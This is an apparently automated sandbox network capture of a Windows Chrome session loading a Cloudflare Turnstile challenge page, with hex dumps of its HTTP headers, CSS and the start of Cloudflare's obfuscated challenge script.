                                                                                                                                                2024-10-28 16:47:38 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                14192.168.2.1649731104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:38 UTC764OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:38 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:38 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Content-Length: 26426
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                document-policy: js-profiling
                                                                                                                                                2024-10-28 16:47:38 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 39 63 36 38 61 63 30 66 36 38 65 37 39 61 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8d9c68ac0f68e79a-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:38 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                                                                                                Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                                                                                                Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f
                                                                                                                                                Data Ascii: nge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-o
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e
                                                                                                                                                Data Ascii: .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-lin
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 66
                                                                                                                                                Data Ascii: fset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#f
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 69
                                                                                                                                                Data Ascii: low:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{hei
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 66
                                                                                                                                                Data Ascii: rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justif
                                                                                                                                                2024-10-28 16:47:38 UTC1369INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                Data Ascii: ext-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-li


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                15192.168.2.1649735104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:39 UTC731OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c68ac0f68e79a&lang=auto HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:39 UTC331INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:39 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 118663
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68b109b5e976-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:39 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                                                                                                                2024-10-28 16:47:39 UTC1369INData Raw: 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68
                                                                                                                                                Data Ascii: tile_overrun_description":"Stuck%20here%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22h
                                                                                                                                                2024-10-28 16:47:39 UTC1369INData Raw: 4b 28 31 30 32 36 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 37 32 37 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 30 36 37 29 29 2f 38 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 38 38 35 29 29 2f 39 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 36 39 29 29 2f 31 30 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 32 38 29 29 2f 31 31 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 33 30 36 33 36 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 37 30 30 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74
                                                                                                                                                Data Ascii: K(1026))/6)+parseInt(gK(727))/7*(-parseInt(gK(1067))/8)+-parseInt(gK(885))/9*(-parseInt(gK(1369))/10)+parseInt(gK(1428))/11,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,306366),eM=this||self,eN=eM[gL(1700)],eO=function(gM,d,e,f,g){ret
                                                                                                                                                2024-10-28 16:47:39 UTC1369INData Raw: 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 72 6c 78 54 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4d 28 31 31 31 39 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4e 29 7b 72 65 74 75 72 6e 20 67 4e 3d 62 2c 67 4e 28 31 38 38 38 29 5b 67 4e 28 36 39 35 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 50 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 50 2c 51 2c 52 2c 53 2c 54 2c 4c 2c 4d 2c 4e 29 7b 69 66 28 67 50 3d 67 4d 2c 73 3d 7b 27 52 49 42 74 67
                                                                                                                                                Data Ascii: tion(h,i){return h<i},'rlxTD':function(h,i){return h===i}},e=String[gM(1119)],f={'h':function(h){return h==null?'':f.g(h,6,function(i,gN){return gN=b,gN(1888)[gN(695)](i)})},'g':function(i,j,o,gP,s,x,B,C,D,E,F,G,H,I,J,K,P,Q,R,S,T,L,M,N){if(gP=gM,s={'RIBtg
                                                                                                                                                2024-10-28 16:47:39 UTC1369INData Raw: 29 2c 47 2b 2b 29 2c 42 5b 4d 5d 3d 46 2b 2b 2c 64 5b 67 50 28 31 35 33 34 29 5d 28 53 74 72 69 6e 67 2c 4c 29 29 7d 69 66 28 44 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 50 28 37 38 33 29 5d 5b 67 50 28 34 35 35 29 5d 5b 67 50 28 31 30 38 30 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 67 50 28 31 36 39 36 29 5d 28 32 35 36 2c 44 5b 67 50 28 31 30 31 37 29 5d 28 30 29 29 29 7b 69 66 28 64 5b 67 50 28 38 35 37 29 5d 28 64 5b 67 50 28 31 34 30 38 29 5d 2c 64 5b 67 50 28 31 33 39 34 29 5d 29 29 7b 66 6f 72 28 78 3d 30 3b 64 5b 67 50 28 31 37 39 37 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 64 5b 67 50 28 38 31 32 29 5d 28 4a 2c 64 5b 67 50 28 31 32 37 31 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 67 50 28 31 31 30 35 29 5d 28 6f 28 49 29 29 2c
                                                                                                                                                Data Ascii: ),G++),B[M]=F++,d[gP(1534)](String,L))}if(D!==''){if(Object[gP(783)][gP(455)][gP(1080)](C,D)){if(d[gP(1696)](256,D[gP(1017)](0))){if(d[gP(857)](d[gP(1408)],d[gP(1394)])){for(x=0;d[gP(1797)](x,G);I<<=1,d[gP(812)](J,d[gP(1271)](j,1))?(J=0,H[gP(1105)](o(I)),
